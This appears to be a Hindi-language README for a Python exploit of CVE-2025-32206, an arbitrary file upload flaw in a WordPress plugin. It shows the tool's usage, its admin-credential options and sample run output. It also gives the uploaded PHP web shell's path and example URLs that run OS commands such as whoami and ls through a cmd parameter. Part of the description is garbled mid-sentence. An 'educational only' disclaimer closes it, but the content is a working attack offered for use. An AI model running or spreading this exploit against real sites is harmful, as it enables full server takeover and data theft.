
WordPress Processing Projects Plugin <= 1.0.2 Arbitrary File Upload भेद्यता के प्रति संवेदनशील है।
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"LABCAT प्रोसेसिंग प्रोजेक्ट्स में खतरनाक प्रकार की फ़ाइल का अप्रतिबंधित अपलोड भेद्यता हमलावरों को वेब सर्वर पर वेब शेल अपलोड करने की अनुमति देती है। इससे पूर्ण समझौता (full compromise) हो सकता है।"
यह Python एक्सप्लॉइट स्क्रिप्ट उन वर्डप्रेस साइटों को लक्षित करती है जो भेद्य प्रोसेसिंग प्रोजेक्ट्स प्लगइन (संस्करण <= 1.0.2) का उपयोग करती हैं। यह प्लगइन प्रमाणित उपयोगकर्ताओं से फ़ाइल अपलोड को अनुचित तरीके से संभालता है, जिससे वे मनमानी ZIP फ़ाइलें अपलोड कर सकते हैं जिनमें निष्पादन योग्य PHP कोड (वेब शेल) शामिल होते हैं।
एक्सप्लॉइट स्क्रिप्ट:
Nxploit.php) युक्त एक ZIP फ़ाइल (Nxploited.zip) बनाती है।http://target.com/wp-content/uploads/processing-projects/Nxploit.phpशेल सफलतापूर्वक अपलोड हो जाने के बाद, इसका उपयोग cmd पैरामीटर के माध्यम से सिस्टम कमांड निष्पादित करने के लिए किया जा सकता है। उदाहरण:
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=whoami
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=ls
यह शेल मनमाने OS कमांड निष्पादित करता है और उनका आउटपुट सीधे प्रतिक्रिया में लौटाता है।
usage: CVE-2025-32206.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit for CVE-2025-32206 | By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress URL (e.g. http://target.com/wordpress)
-un, --username USERNAME WordPress admin username
-p, --password PASSWORD WordPress admin password
[+] CVE-2025-32206 | WordPress Processing Projects <= 1.0.2 - Arbitrary File Upload
[+] By Nxploited | Khaled Alenazi
[+] Created zip with shell: Nxploited.zip -> Nxploit.php
[+] Logged in successfully.
[+] Extracted form fields successfully.
[+] Upload request sent successfully.
[+] Shell executed at: http://target.com/wp-content/uploads/processing-projects/Nxploit.php
यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए प्रदान की गई है। उन सिस्टमों पर इस एक्सप्लॉइट का अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है।
हमेशा जिम्मेदार प्रकटीकरण (responsible disclosure) प्रथाओं का पालन करें और इस उपकरण का उपयोग केवल नियंत्रित वातावरण में या स्पष्ट प्राधिकरण के साथ करें।
द्वारा : Nxploited | Khaled Alenazi